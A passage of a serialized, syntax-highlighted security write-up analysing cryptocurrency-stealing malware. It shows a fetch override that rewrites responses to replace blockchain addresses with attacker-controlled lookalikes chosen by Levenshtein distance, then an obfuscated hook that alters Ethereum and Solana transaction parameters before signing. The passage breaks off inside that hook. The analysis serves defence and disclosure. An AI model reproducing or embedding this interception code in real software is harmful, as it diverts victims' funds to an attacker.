runmask",{"type":27,"tag":207,"props":104683,"children":104684},{"style":238},[104685],{"type":33,"value":4301},{"type":27,"tag":207,"props":104687,"children":104688},{"class":209,"line":1475},[104689,104693,104697,104702,104706,104710],{"type":27,"tag":207,"props":104690,"children":104691},{"style":376},[104692],{"type":33,"value":46532},{"type":27,"tag":207,"props":104694,"children":104695},{"style":238},[104696],{"type":33,"value":686},{"type":27,"tag":207,"props":104698,"children":104699},{"style":220},[104700],{"type":33,"value":104701},"rund",{"type":27,"tag":207,"props":104703,"children":104704},{"style":226},[104705],{"type":33,"value":71619},{"type":27,"tag":207,"props":104707,"children":104708},{"style":232},[104709],{"type":33,"value":235},{"type":27,"tag":207,"props":104711,"children":104712},{"style":238},[104713],{"type":33,"value":1424},{"type":27,"tag":207,"props":104715,"children":104716},{"class":209,"line":2065},[104717,104722,104726,104730],{"type":27,"tag":207,"props":104718,"children":104719},{"style":220},[104720],{"type":33,"value":104721}," rund",{"type":27,"tag":207,"props":104723,"children":104724},{"style":226},[104725],{"type":33,"value":229},{"type":27,"tag":207,"props":104727,"children":104728},{"style":232},[104729],{"type":33,"value":235},{"type":27,"tag":207,"props":104731,"children":104732},{"style":238},[104733],{"type":33,"value":241},{"type":27,"tag":207,"props":104735,"children":104736},{"class":209,"line":2092},[104737,104742,104746,104750],{"type":27,"tag":207,"props":104738,"children":104739},{"style":220},[104740],{"type":33,"value":104741}," neth",{"type":27,"tag":207,"props":104743,"children":104744},{"style":226},[104745],{"type":33,"value":229},{"type":27,"tag":207,"props":104747,"children":104748},{"style":232},[104749],{"type":33,"value":235},{"type":27,"tag":207,"props":104751,"children":104752},{"style":238},[104753],{"type":33,"value":241},{"type":27,"tag":207,"props":104755,"children":104756},{"class":209,"line":2130},[104757,104762],{"type":27,"tag":207,"props":104758,"children":104759},{"style":1335},[104760],{"type":33,"value":104761}," newdlocal",{"type":27,"tag":207,"props":104763,"children":104764},{"style":238},[104765],{"type":33,"value":4301},{"type":27,"tag":207,"props":104767,"children":104768},{"class":209,"line":2168},[104769],{"type":27,"tag":207,"props":104770,"children":104771},{"style":238},[104772],{"type":33,"value":19941},{"type":27,"tag":207,"props":104774,"children":104775},{"class":209,"line":4095},[104776,104780,104784,104788,104792,104796,104800,104804],{"type":27,"tag":207,"props":104777,"children":104778},{"style":238},[104779],{"type":33,"value":23054},{"type":27,"tag":207,"props":104781,"children":104782},{"style":376},[104783],{"type":33,"value":10605},{"type":27,"tag":207,"props":104785,"children":104786},{"style":376},[104787],{"type":33,"value":23063},{"type":27,"tag":207,"props":104789,"children":104790},{"style":238},[104791],{"type":33,"value":686},{"type":27,"tag":207,"props":104793,"children":104794},{"style":220},[104795],{"type":33,"value":104701},{"type":27,"tag":207,"props":104797,"children":104798},{"style":226},[104799],{"type":33,"value":71619},{"type":27,"tag":207,"props":104801,"children":104802},{"style":232},[104803],{"type":33,"value":235},{"type":27,"tag":207,"props":104805,"children":104806},{"style":238},[104807],{"type":33,"value":1424},{"type":27,"tag":207,"props":104809,"children":104810},{"class":209,"line":4103},[104811,104816,104820,104824],{"type":27,"tag":207,"props":104812,"children":104813},{"style":220},[104814],{"type":33,"value":104815}," rund",{"type":27,"tag":207,"props":104817,"children":104818},{"style":226},[104819],{"type":33,"value":229},{"type":27,"tag":207,"props":104821,"children":104822},{"style":232},[104823],{"type":33,"value":235},{"type":27,"tag":207,"props":104825,"children":104826},{"style":238},[104827],{"type":33,"value":241},{"type":27,"tag":207,"props":104829,"children":104830},{"class":209,"line":4154},[104831,104836],{"type":27,"tag":207,"props":104832,"children":104833},{"style":1335},[104834],{"type":33,"value":104835}," newdlocal",{"type":27,"tag":207,"props":104837,"children":104838},{"style":238},[104839],{"type":33,"value":4301},{"type":27,"tag":207,"props":104841,"children":104842},{"class":209,"line":4203},[104843],{"type":27,"tag":207,"props":104844,"children":104845},{"style":238},[104846],{"type":33,"value":10645},{"type":27,"tag":207,"props":104848,"children":104849},{"class":209,"line":4249},[104850],{"type":27,"tag":207,"props":104851,"children":104852},{"style":238},[104853],{"type":33,"value":5312},{"type":27,"tag":207,"props":104855,"children":104856},{"class":209,"line":4290},[104857],{"type":27,"tag":207,"props":104858,"children":104859},{"style":238},[104860],{"type":33,"value":451},{"type":27,"tag":12719,"props":104862,"children":104863},{"start":244},[104864],{"type":27,"tag":1232,"props":104865,"children":104866},{},[104867],{"type":33,"value":104868},"Intercept HTTP requests/responses and replace blockchain addresses with the attacker's wallet: (modified code for better understanding)",{"type":27,"tag":101,"props":104870,"children":104872},{"code":104871,"language":200,"meta":7,"className":201,"style":7},"fetch = async function (...args) {\n const originalResponse = await originalFetch.call(this, ...args);\n const contentType = originalResponse.headers.get('Content-Type') || '';\n let data;\n if (contentType.includes('application/json')) {\n data = await originalResponse.clone().json();\n } else {\n data = await originalResponse.clone().text();\n }\n const processedData = replaceAddresses(data);\n const finalResponseText =\n typeof processedData === 'string' ? processedData : JSON.stringify(processedData);\n const finalResponse = new Response(finalResponseText, {\n status: originalResponse.status,\n statusText: originalResponse.statusText,\n headers: originalResponse.headers,\n });\n return finalResponse;\n};\n",[104873],{"type":27,"tag":84,"props":104874,"children":104875},{"__ignoreMap":7},[104876,104911,104968,105030,105045,105082,105121,105136,105175,105182,105215,105231,105290,105328,105353,105378,105402,105410,105425],{"type":27,"tag":207,"props":104877,"children":104878},{"class":209,"line":210},[104879,104883,104887,104891,104895,104899,104903,104907],{"type":27,"tag":207,"props":104880,"children":104881},{"style":1335},[104882],{"type":33,"value":41350},{"type":27,"tag":207,"props":104884,"children":104885},{"style":226},[104886],{"type":33,"value":229},{"type":27,"tag":207,"props":104888,"children":104889},{"style":214},[104890],{"type":33,"value":43615},{"type":27,"tag":207,"props":104892,"children":104893},{"style":214},[104894],{"type":33,"value":45461},{"type":27,"tag":207,"props":104896,"children":104897},{"style":238},[104898],{"type":33,"value":686},{"type":27,"tag":207,"props":104900,"children":104901},{"style":226},[104902],{"type":33,"value":16867},{"type":27,"tag":207,"props":104904,"children":104905},{"style":220},[104906],{"type":33,"value":1105},{"type":27,"tag":207,"props":104908,"children":104909},{"style":238},[104910],{"type":33,"value":1424},{"type":27,"tag":207,"props":104912,"children":104913},{"class":209,"line":244},[104914,104918,104923,104927,104931,104936,104940,104944,104948,104952,104956,104960,104964],{"type":27,"tag":207,"props":104915,"children":104916},{"style":214},[104917],{"type":33,"value":2333},{"type":27,"tag":207,"props":104919,"children":104920},{"style":220},[104921],{"type":33,"value":104922}," originalResponse",{"type":27,"tag":207,"props":104924,"children":104925},{"style":226},[104926],{"type":33,"value":229},{"type":27,"tag":207,"props":104928,"children":104929},{"style":376},[104930],{"type":33,"value":43461},{"type":27,"tag":207,"props":104932,"children":104933},{"style":220},[104934],{"type":33,"value":104935}," originalFetch",{"type":27,"tag":207,"props":104937,"children":104938},{"style":238},[104939],{"type":33,"value":1041},{"type":27,"tag":207,"props":104941,"children":104942},{"style":1335},[104943],{"type":33,"value":45542},{"type":27,"tag":207,"props":104945,"children":104946},{"style":238},[104947],{"type":33,"value":1343},{"type":27,"tag":207,"props":104949,"children":104950},{"style":214},[104951],{"type":33,"value":24964},{"type":27,"tag":207,"props":104953,"children":104954},{"style":238},[104955],{"type":33,"value":1123},{"type":27,"tag":207,"props":104957,"children":104958},{"style":226},[104959],{"type":33,"value":16867},{"type":27,"tag":207,"props":104961,"children":104962},{"style":220},[104963],{"type":33,"value":1105},{"type":27,"tag":207,"props":104965,"children":104966},{"style":238},[104967],{"type":33,"value":1455},{"type":27,"tag":207,"props":104969,"children":104970},{"class":209,"line":270},[104971,104975,104980,104984,104988,104992,104997,105001,105005,105009,105014,105018,105022,105026],{"type":27,"tag":207,"props":104972,"children":104973},{"style":214},[104974],{"type":33,"value":2333},{"type":27,"tag":207,"props":104976,"children":104977},{"style":220},[104978],{"type":33,"value":104979}," contentType",{"type":27,"tag":207,"props":104981,"children":104982},{"style":226},[104983],{"type":33,"value":229},{"type":27,"tag":207,"props":104985,"children":104986},{"style":220},[104987],{"type":33,"value":104922},{"type":27,"tag":207,"props":104989,"children":104990},{"style":238},[104991],{"type":33,"value":1041},{"type":27,"tag":207,"props":104993,"children":104994},{"style":220},[104995],{"type":33,"value":104996},"headers",{"type":27,"tag":207,"props":104998,"children":104999},{"style":238},[105000],{"type":33,"value":1041},{"type":27,"tag":207,"props":105002,"children":105003},{"style":1335},[105004],{"type":33,"value":23627},{"type":27,"tag":207,"props":105006,"children":105007},{"style":238},[105008],{"type":33,"value":1343},{"type":27,"tag":207,"props":105010,"children":105011},{"style":1325},[105012],{"type":33,"value":105013},"'Content-Type'",{"type":27,"tag":207,"props":105015,"children":105016},{"style":238},[105017],{"type":33,"value":2222},{"type":27,"tag":207,"props":105019,"children":105020},{"style":226},[105021],{"type":33,"value":29691},{"type":27,"tag":207,"props":105023,"children":105024},{"style":1325},[105025],{"type":33,"value":39099},{"type":27,"tag":207,"props":105027,"children":105028},{"style":238},[105029],{"type":33,"value":241},{"type":27,"tag":207,"props":105031,"children":105032},{"class":209,"line":296},[105033,105037,105041],{"type":27,"tag":207,"props":105034,"children":105035},{"style":214},[105036],{"type":33,"value":425},{"type":27,"tag":207,"props":105038,"children":105039},{"style":220},[105040],{"type":33,"value":22379},{"type":27,"tag":207,"props":105042,"children":105043},{"style":238},[105044],{"type":33,"value":241},{"type":27,"tag":207,"props":105046,"children":105047},{"class":209,"line":445},[105048,105052,105056,105061,105065,105069,105073,105078],{"type":27,"tag":207,"props":105049,"children":105050},{"style":376},[105051],{"type":33,"value":38654},{"type":27,"tag":207,"props":105053,"children":105054},{"style":238},[105055],{"type":33,"value":686},{"type":27,"tag":207,"props":105057,"children":105058},{"style":220},[105059],{"type":33,"value":105060},"contentType",{"type":27,"tag":207,"props":105062,"children":105063},{"style":238},[105064],{"type":33,"value":1041},{"type":27,"tag":207,"props":105066,"children":105067},{"style":1335},[105068],{"type":33,"value":42436},{"type":27,"tag":207,"props":105070,"children":105071},{"style":238},[105072],{"type":33,"value":1343},{"type":27,"tag":207,"props":105074,"children":105075},{"style":1325},[105076],{"type":33,"value":105077},"'application/json'",{"type":27,"tag":207,"props":105079,"children":105080},{"style":238},[105081],{"type":33,"value":8955},{"type":27,"tag":207,"props":105083,"children":105084},{"class":209,"line":867},[105085,105089,105093,105097,105101,105105,105109,105113,105117],{"type":27,"tag":207,"props":105086,"children":105087},{"style":220},[105088],{"type":33,"value":50477},{"type":27,"tag":207,"props":105090,"children":105091},{"style":226},[105092],{"type":33,"value":229},{"type":27,"tag":207,"props":105094,"children":105095},{"style":376},[105096],{"type":33,"value":43461},{"type":27,"tag":207,"props":105098,"children":105099},{"style":220},[105100],{"type":33,"value":104922},{"type":27,"tag":207,"props":105102,"children":105103},{"style":238},[105104],{"type":33,"value":1041},{"type":27,"tag":207,"props":105106,"children":105107},{"style":1335},[105108],{"type":33,"value":22695},{"type":27,"tag":207,"props":105110,"children":105111},{"style":238},[105112],{"type":33,"value":37429},{"type":27,"tag":207,"props":105114,"children":105115},{"style":1335},[105116],{"type":33,"value":41253},{"type":27,"tag":207,"props":105118,"children":105119},{"style":238},[105120],{"type":33,"value":4301},{"type":27,"tag":207,"props":105122,"children":105123},{"class":209,"line":892},[105124,105128,105132],{"type":27,"tag":207,"props":105125,"children":105126},{"style":238},[105127],{"type":33,"value":38728},{"type":27,"tag":207,"props":105129,"children":105130},{"style":376},[105131],{"type":33,"value":10605},{"type":27,"tag":207,"props":105133,"children":105134},{"style":238},[105135],{"type":33,"value":384},{"type":27,"tag":207,"props":105137,"children":105138},{"class":209,"line":1475},[105139,105143,105147,105151,105155,105159,105163,105167,105171],{"type":27,"tag":207,"props":105140,"children":105141},{"style":220},[105142],{"type":33,"value":50477},{"type":27,"tag":207,"props":105144,"children":105145},{"style":226},[105146],{"type":33,"value":229},{"type":27,"tag":207,"props":105148,"children":105149},{"style":376},[105150],{"type":33,"value":43461},{"type":27,"tag":207,"props":105152,"children":105153},{"style":220},[105154],{"type":33,"value":104922},{"type":27,"tag":207,"props":105156,"children":105157},{"style":238},[105158],{"type":33,"value":1041},{"type":27,"tag":207,"props":105160,"children":105161},{"style":1335},[105162],{"type":33,"value":22695},{"type":27,"tag":207,"props":105164,"children":105165},{"style":238},[105166],{"type":33,"value":37429},{"type":27,"tag":207,"props":105168,"children":105169},{"style":1335},[105170],{"type":33,"value":33},{"type":27,"tag":207,"props":105172,"children":105173},{"style":238},[105174],{"type":33,"value":4301},{"type":27,"tag":207,"props":105176,"children":105177},{"class":209,"line":2065},[105178],{"type":27,"tag":207,"props":105179,"children":105180},{"style":238},[105181],{"type":33,"value":5312},{"type":27,"tag":207,"props":105183,"children":105184},{"class":209,"line":2092},[105185,105189,105194,105198,105203,105207,105211],{"type":27,"tag":207,"props":105186,"children":105187},{"style":214},[105188],{"type":33,"value":2333},{"type":27,"tag":207,"props":105190,"children":105191},{"style":220},[105192],{"type":33,"value":105193}," processedData",{"type":27,"tag":207,"props":105195,"children":105196},{"style":226},[105197],{"type":33,"value":229},{"type":27,"tag":207,"props":105199,"children":105200},{"style":1335},[105201],{"type":33,"value":105202}," replaceAddresses",{"type":27,"tag":207,"props":105204,"children":105205},{"style":238},[105206],{"type":33,"value":1343},{"type":27,"tag":207,"props":105208,"children":105209},{"style":220},[105210],{"type":33,"value":9468},{"type":27,"tag":207,"props":105212,"children":105213},{"style":238},[105214],{"type":33,"value":1455},{"type":27,"tag":207,"props":105216,"children":105217},{"class":209,"line":2130},[105218,105222,105227],{"type":27,"tag":207,"props":105219,"children":105220},{"style":214},[105221],{"type":33,"value":2333},{"type":27,"tag":207,"props":105223,"children":105224},{"style":220},[105225],{"type":33,"value":105226}," finalResponseText",{"type":27,"tag":207,"props":105228,"children":105229},{"style":226},[105230],{"type":33,"value":43107},{"type":27,"tag":207,"props":105232,"children":105233},{"class":209,"line":2168},[105234,105239,105243,105247,105252,105257,105261,105265,105269,105273,105277,105281,105286],{"type":27,"tag":207,"props":105235,"children":105236},{"style":214},[105237],{"type":33,"value":105238}," typeof",{"type":27,"tag":207,"props":105240,"children":105241},{"style":220},[105242],{"type":33,"value":105193},{"type":27,"tag":207,"props":105244,"children":105245},{"style":226},[105246],{"type":33,"value":38682},{"type":27,"tag":207,"props":105248,"children":105249},{"style":1325},[105250],{"type":33,"value":105251}," 'string'",{"type":27,"tag":207,"props":105253,"children":105254},{"style":226},[105255],{"type":33,"value":105256}," ?",{"type":27,"tag":207,"props":105258,"children":105259},{"style":220},[105260],{"type":33,"value":105193},{"type":27,"tag":207,"props":105262,"children":105263},{"style":226},[105264],{"type":33,"value":42371},{"type":27,"tag":207,"props":105266,"children":105267},{"style":220},[105268],{"type":33,"value":44777},{"type":27,"tag":207,"props":105270,"children":105271},{"style":238},[105272],{"type":33,"value":1041},{"type":27,"tag":207,"props":105274,"children":105275},{"style":1335},[105276],{"type":33,"value":46478},{"type":27,"tag":207,"props":105278,"children":105279},{"style":238},[105280],{"type":33,"value":1343},{"type":27,"tag":207,"props":105282,"children":105283},{"style":220},[105284],{"type":33,"value":105285},"processedData",{"type":27,"tag":207,"props":105287,"children":105288},{"style":238},[105289],{"type":33,"value":1455},{"type":27,"tag":207,"props":105291,"children":105292},{"class":209,"line":4095},[105293,105297,105302,105306,105310,105315,105319,105324],{"type":27,"tag":207,"props":105294,"children":105295},{"style":214},[105296],{"type":33,"value":2333},{"type":27,"tag":207,"props":105298,"children":105299},{"style":220},[105300],{"type":33,"value":105301}," finalResponse",{"type":27,"tag":207,"props":105303,"children":105304},{"style":226},[105305],{"type":33,"value":229},{"type":27,"tag":207,"props":105307,"children":105308},{"style":214},[105309],{"type":33,"value":1597},{"type":27,"tag":207,"props":105311,"children":105312},{"style":1335},[105313],{"type":33,"value":105314}," Response",{"type":27,"tag":207,"props":105316,"children":105317},{"style":238},[105318],{"type":33,"value":1343},{"type":27,"tag":207,"props":105320,"children":105321},{"style":220},[105322],{"type":33,"value":105323},"finalResponseText",{"type":27,"tag":207,"props":105325,"children":105326},{"style":238},[105327],{"type":33,"value":56120},{"type":27,"tag":207,"props":105329,"children":105330},{"class":209,"line":4103},[105331,105336,105340,105344,105349],{"type":27,"tag":207,"props":105332,"children":105333},{"style":220},[105334],{"type":33,"value":105335}," status:",{"type":27,"tag":207,"props":105337,"children":105338},{"style":220},[105339],{"type":33,"value":104922},{"type":27,"tag":207,"props":105341,"children":105342},{"style":238},[105343],{"type":33,"value":1041},{"type":27,"tag":207,"props":105345,"children":105346},{"style":220},[105347],{"type":33,"value":105348},"status",{"type":27,"tag":207,"props":105350,"children":105351},{"style":238},[105352],{"type":33,"value":1842},{"type":27,"tag":207,"props":105354,"children":105355},{"class":209,"line":4154},[105356,105361,105365,105369,105374],{"type":27,"tag":207,"props":105357,"children":105358},{"style":220},[105359],{"type":33,"value":105360}," statusText:",{"type":27,"tag":207,"props":105362,"children":105363},{"style":220},[105364],{"type":33,"value":104922},{"type":27,"tag":207,"props":105366,"children":105367},{"style":238},[105368],{"type":33,"value":1041},{"type":27,"tag":207,"props":105370,"children":105371},{"style":220},[105372],{"type":33,"value":105373},"statusText",{"type":27,"tag":207,"props":105375,"children":105376},{"style":238},[105377],{"type":33,"value":1842},{"type":27,"tag":207,"props":105379,"children":105380},{"class":209,"line":4203},[105381,105386,105390,105394,105398],{"type":27,"tag":207,"props":105382,"children":105383},{"style":220},[105384],{"type":33,"value":105385}," headers:",{"type":27,"tag":207,"props":105387,"children":105388},{"style":220},[105389],{"type":33,"value":104922},{"type":27,"tag":207,"props":105391,"children":105392},{"style":238},[105393],{"type":33,"value":1041},{"type":27,"tag":207,"props":105395,"children":105396},{"style":220},[105397],{"type":33,"value":104996},{"type":27,"tag":207,"props":105399,"children":105400},{"style":238},[105401],{"type":33,"value":1842},{"type":27,"tag":207,"props":105403,"children":105404},{"class":209,"line":4249},[105405],{"type":27,"tag":207,"props":105406,"children":105407},{"style":238},[105408],{"type":33,"value":105409}," });\n",{"type":27,"tag":207,"props":105411,"children":105412},{"class":209,"line":4290},[105413,105417,105421],{"type":27,"tag":207,"props":105414,"children":105415},{"style":376},[105416],{"type":33,"value":46444},{"type":27,"tag":207,"props":105418,"children":105419},{"style":220},[105420],{"type":33,"value":105301},{"type":27,"tag":207,"props":105422,"children":105423},{"style":238},[105424],{"type":33,"value":241},{"type":27,"tag":207,"props":105426,"children":105427},{"class":209,"line":4304},[105428],{"type":27,"tag":207,"props":105429,"children":105430},{"style":238},[105431],{"type":33,"value":23852},{"type":27,"tag":12719,"props":105433,"children":105434},{"start":270},[105435],{"type":27,"tag":1232,"props":105436,"children":105437},{},[105438],{"type":33,"value":105439},"The malware intercepted wallet requests and silently replaced the receiver address with the attacker address. Instead of a blunt substitution, it used the Levenshtein distance algorithm to pick a lookalike address, which made it harder for victims to notice funds being siphoned.",{"type":27,"tag":101,"props":105441,"children":105443},{"code":105442,"language":200,"meta":7,"className":201,"style":7},"if (_0x2c3d7e.method === 'eth_sendTransaction' && _0x2c3d7e.params && _0x2c3d7e.params[0]) {\n try {\n const _0x39ad21 = _0x1089ae(_0x2c3d7e.params[0], true);\n _0x2c3d7e.params[0] = _0x39ad21;\n } catch (_0x226343) {}\n} else {\n if (\n (_0x2c3d7e.method === 'solana_signTransaction' ||\n _0x2c3d7e.method === 'solana_signAndSendTransaction') &&\n _0x2c3d7e.params &&\n _0x2c3d7e.params[0]\n ) {\n try {\n let _0x5ad975 = _0x2c3d7e.params[0];\n if (_0x5ad975.transaction) {\n _0x5ad975 = _0x5ad975.transaction;\n }\n const _0x5dbe63 = _0x1089ae(_0x5ad975, false);\n if (_0x2c3d7e.params[0].transaction) {\n _0x2c3d7e.params[0].transaction = _0x5dbe63;\n } else {\n _0x2c3d7e.params[0] = _0x5dbe63;\n }\n } catch (_0x4b99fd) {}\n }\n}\n",[105444],{"type":27,"tag":84,"props":105445,"children":105446},{"__ignoreMap":7},[105447,105526,105537,105594,105634,105659,105674,105685,105719,105752,105771,105798,105806,105817,105857,105886,105914,105921,105961,106004,106048,106063,106102,106109,106133,106140],{"type":27,"tag":207,"props":105448,"children":105449},{"class":209,"line":210},[105450,105454,105458,105463,105467,105471,105475,105480,105484,105489,105493,105498,105502,105506,105510,105514,105518,105522],{"type":27,"tag":207,"props":105451,"children":105452},{"style":376},[105453],{"type":33,"value":9023},{"type":27,"tag":207,"props":105455,"children":105456},{"style":238},[105457],{"type":33,"value":686},{"type":27,"tag":207,"props":105459,"children":105460},{"style":220},[105461],{"type":33,"value":105462},"_0x2c3d7e",{"type":27,"tag":207,"props":105464,"children":105465},{"style":238},[105466],{"type":33,"value":1041},{"type":27,"tag":207,"props":105468,"children":105469},{"style":220},[105470],{"type":33,"value":45559},{"type":27,"tag":207,"props":105472,"children":105473},{"style":226},[105474],{"type":33,"value":38682},{"type":27,"tag":207,"props":105476,"children":105477},{"style":1325},[105478],{"type":33,"value":105479}," 'eth_sendTransaction'",{"type":27,"tag":207,"props":105481,"children":105482},{"style":226},[105483],{"type":33,"value":21461},{"type":27,"tag":207,"props":105485,"children":105486},{"style":220},[105487],{"type":33,"value":105488}," _0x2c3d7e",{"type":27,"tag":207,"props":105490,"children":105491},{"style":238},[105492],{"type":33,"value":1041},{"type":27,"tag":207,"props":105494,"children":105495},{"style":220},[105496],{"type":33,"value":105497},"params",{"type":27,"tag":207,"props":105499,"children":105500},{"style":226},[105501],{"type":33,"value":21461},{"type":27,"tag":207,"props":105503,"children":105504},{"style":220},[105505],{"type":33,"value":105488},{"type":27,"tag":207,"props":105507,"children":105508},{"style":238},[105509],{"type":33,"value":1041},{"type":27,"tag":207,"props":105511,"children":105512},{"style":220},[105513],{"type":33,"value":105497},{"type":27,"tag":207,"props":105515,"children":105516},{"style":238},[105517],{"type":33,"value":11019},{"type":27,"tag":207,"props":105519,"children":105520},{"style":232},[105521],{"type":33,"value":1660},{"type":27,"tag":207,"props":105523,"children":105524},{"style":238},[105525],{"type":33,"value":47869},{"type":27,"tag":207,"props":105527,"children":105528},{"class":209,"line":244},[105529,105533],{"type":27,"tag":207,"props":105530,"children":105531},{"style":376},[105532],{"type":33,"value":104565},{"type":27,"tag":207,"props":105534,"children":105535},{"style":238},[105536],{"type":33,"value":384},{"type":27,"tag":207,"props":105538,"children":105539},{"class":209,"line":270},[105540,105544,105549,105553,105558,105562,105566,105570,105574,105578,105582,105586,105590],{"type":27,"tag":207,"props":105541,"children":105542},{"style":214},[105543],{"type":33,"value":58904},{"type":27,"tag":207,"props":105545,"children":105546},{"style":220},[105547],{"type":33,"value":105548}," _0x39ad21",{"type":27,"tag":207,"props":105550,"children":105551},{"style":226},[105552],{"type":33,"value":229},{"type":27,"tag":207,"props":105554,"children":105555},{"style":1335},[105556],{"type":33,"value":105557}," _0x1089ae",{"type":27,"tag":207,"props":105559,"children":105560},{"style":238},[105561],{"type":33,"value":1343},{"type":27,"tag":207,"props":105563,"children":105564},{"style":220},[105565],{"type":33,"value":105462},{"type":27,"tag":207,"props":105567,"children":105568},{"style":238},[105569],{"type":33,"value":1041},{"type":27,"tag":207,"props":105571,"children":105572},{"style":220},[105573],{"type":33,"value":105497},{"type":27,"tag":207,"props":105575,"children":105576},{"style":238},[105577],{"type":33,"value":11019},{"type":27,"tag":207,"props":105579,"children":105580},{"style":232},[105581],{"type":33,"value":1660},{"type":27,"tag":207,"props":105583,"children":105584},{"style":238},[105585],{"type":33,"value":30333},{"type":27,"tag":207,"props":105587,"children":105588},{"style":214},[105589],{"type":33,"value":11278},{"type":27,"tag":207,"props":105591,"children":105592},{"style":238},[105593],{"type":33,"value":1455},{"type":27,"tag":207,"props":105595,"children":105596},{"class":209,"line":296},[105597,105602,105606,105610,105614,105618,105622,105626,105630],{"type":27,"tag":207,"props":105598,"children":105599},{"style":220},[105600],{"type":33,"value":105601}," _0x2c3d7e",{"type":27,"tag":207,"props":105603,"children":105604},{"style":238},[105605],{"type":33,"value":1041},{"type":27,"tag":207,"props":105607,"children":105608},{"style":220},[105609],{"type":33,"value":105497},{"type":27,"tag":207,"props":105611,"children":105612},{"style":238},[105613],{"type":33,"value":11019},{"type":27,"tag":207,"props":105615,"children":105616},{"style":232},[105617],{"type":33,"value":1660},{"type":27,"tag":207,"props":105619,"children":105620},{"style":238},[105621],{"type":33,"value":15942},{"type":27,"tag":207,"props":105623,"children":105624},{"style":226},[105625],{"type":33,"value":10380},{"type":27,"tag":207,"props":105627,"children":105628},{"style":220},[105629],{"type":33,"value":105548},{"type":27,"tag":207,"props":105631,"children":105632},{"style":238},[105633],{"type":33,"value":241},{"type":27,"tag":207,"props":105635,"children":105636},{"class":209,"line":445},[105637,105641,105645,105649,105654],{"type":27,"tag":207,"props":105638,"children":105639},{"style":238},[105640],{"type":33,"value":38728},{"type":27,"tag":207,"props":105642,"children":105643},{"style":376},[105644],{"type":33,"value":413},{"type":27,"tag":207,"props":105646,"children":105647},{"style":238},[105648],{"type":33,"value":686},{"type":27,"tag":207,"props":105650,"children":105651},{"style":220},[105652],{"type":33,"value":105653},"_0x226343",{"type":27,"tag":207,"props":105655,"children":105656},{"style":238},[105657],{"type":33,"value":105658},") {}\n",{"type":27,"tag":207,"props":105660,"children":105661},{"class":209,"line":867},[105662,105666,105670],{"type":27,"tag":207,"props":105663,"children":105664},{"style":238},[105665],{"type":33,"value":408},{"type":27,"tag":207,"props":105667,"children":105668},{"style":376},[105669],{"type":33,"value":10605},{"type":27,"tag":207,"props":105671,"children":105672},{"style":238},[105673],{"type":33,"value":384},{"type":27,"tag":207,"props":105675,"children":105676},{"class":209,"line":892},[105677,105681],{"type":27,"tag":207,"props":105678,"children":105679},{"style":376},[105680],{"type":33,"value":38654},{"type":27,"tag":207,"props":105682,"children":105683},{"style":238},[105684],{"type":33,"value":85797},{"type":27,"tag":207,"props":105686,"children":105687},{"class":209,"line":1475},[105688,105693,105697,105701,105705,105709,105714],{"type":27,"tag":207,"props":105689,"children":105690},{"style":238},[105691],{"type":33,"value":105692}," (",{"type":27,"tag":207,"props":105694,"children":105695},{"style":220},[105696],{"type":33,"value":105462},{"type":27,"tag":207,"props":105698,"children":105699},{"style":238},[105700],{"type":33,"value":1041},{"type":27,"tag":207,"props":105702,"children":105703},{"style":220},[105704],{"type":33,"value":45559},{"type":27,"tag":207,"props":105706,"children":105707},{"style":226},[105708],{"type":33,"value":38682},{"type":27,"tag":207,"props":105710,"children":105711},{"style":1325},[105712],{"type":33,"value":105713}," 'solana_signTransaction'",{"type":27,"tag":207,"props":105715,"children":105716},{"style":226},[105717],{"type":33,"value":105718}," ||\n",{"type":27,"tag":207,"props":105720,"children":105721},{"class":209,"line":2065},[105722,105727,105731,105735,105739,105744,105748],{"type":27,"tag":207,"props":105723,"children":105724},{"style":220},[105725],{"type":33,"value":105726}," _0x2c3d7e",{"type":27,"tag":207,"props":105728,"children":105729},{"style":238},[105730],{"type":33,"value":1041},{"type":27,"tag":207,"props":105732,"children":105733},{"style":220},[105734],{"type":33,"value":45559},{"type":27,"tag":207,"props":105736,"children":105737},{"style":226},[105738],{"type":33,"value":38682},{"type":27,"tag":207,"props":105740,"children":105741},{"style":1325},[105742],{"type":33,"value":105743}," 'solana_signAndSendTransaction'",{"type":27,"tag":207,"props":105745,"children":105746},{"style":238},[105747],{"type":33,"value":2222},{"type":27,"tag":207,"props":105749,"children":105750},{"style":226},[105751],{"type":33,"value":91038},{"type":27,"tag":207,"props":105753,"children":105754},{"class":209,"line":2092},[105755,105759,105763,105767],{"type":27,"tag":207,"props":105756,"children":105757},{"style":220},[105758],{"type":33,"value":105601},{"type":27,"tag":207,"props":105760,"children":105761},{"style":238},[105762],{"type":33,"value":1041},{"type":27,"tag":207,"props":105764,"children":105765},{"style":220},[105766],{"type":33,"value":105497},{"type":27,"tag":207,"props":105768,"children":105769},{"style":226},[105770],{"type":33,"value":59920},{"type":27,"tag":207,"props":105772,"children":105773},{"class":209,"line":2130},[105774,105778,105782,105786,105790,105794],{"type":27,"tag":207,"props":105775,"children":105776},{"style":220},[105777],{"type":33,"value":105601},{"type":27,"tag":207,"props":105779,"children":105780},{"style":238},[105781],{"type":33,"value":1041},{"type":27,"tag":207,"props":105783,"children":105784},{"style":220},[105785],{"type":33,"value":105497},{"type":27,"tag":207,"props":105787,"children":105788},{"style":238},[105789],{"type":33,"value":11019},{"type":27,"tag":207,"props":105791,"children":105792},{"style":232},[105793],{"type":33,"value":1660},{"type":27,"tag":207,"props":105795,"children":105796},{"style":238},[105797],{"type":33,"value":19050},{"type":27,"tag":207,"props":105799,"children":105800},{"class":209,"line":2168},[105801],{"type":27,"tag":207,"props":105802,"children":105803},{"style":238},[105804],{"type":33,"value":105805}," ) {\n",{"type":27,"tag":207,"props":105807,"children":105808},{"class":209,"line":4095},[105809,105813],{"type":27,"tag":207,"props":105810,"children":105811},{"style":376},[105812],{"type":33,"value":77216},{"type":27,"tag":207,"props":105814,"children":105815},{"style":238},[105816],{"type":33,"value":384},{"type":27,"tag":207,"props":105818,"children":105819},{"class":209,"line":4103},[105820,105824,105829,105833,105837,105841,105845,105849,105853],{"type":27,"tag":207,"props":105821,"children":105822},{"style":214},[105823],{"type":33,"value":15356},{"type":27,"tag":207,"props":105825,"children":105826},{"style":220},[105827],{"type":33,"value":105828}," 